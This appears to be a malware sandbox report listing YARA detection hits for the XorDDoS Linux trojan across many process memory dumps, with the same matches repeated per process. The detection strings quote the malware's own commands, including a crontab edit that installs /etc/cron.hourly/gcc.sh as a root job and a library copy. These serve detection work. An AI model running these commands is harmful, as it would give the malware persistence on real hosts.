6224.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6224.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6224.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6224.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6443.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6466.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6353.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6253.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6253.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6253.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6253.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6253.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6253.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6253.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6220.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6220.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6220.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6220.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6220.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6220.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6220.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6435.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6345.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6548.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6256.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6256.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6256.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6256.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6256.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6256.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6256.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6291.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6261.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6261.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6261.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
